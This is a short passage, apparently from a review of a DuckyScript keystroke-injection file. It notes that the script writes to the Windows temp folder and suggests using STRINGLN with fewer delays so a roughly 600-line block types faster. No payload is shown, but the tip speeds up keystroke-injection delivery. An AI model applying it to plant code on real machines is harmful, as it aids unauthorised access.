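`$env:TEMP`; and with three `DELAY 200` per typed line the roughly 600-line hunk takes several minutes to type, where STRINGLN with one DELAY per line would halve the file and the runtime.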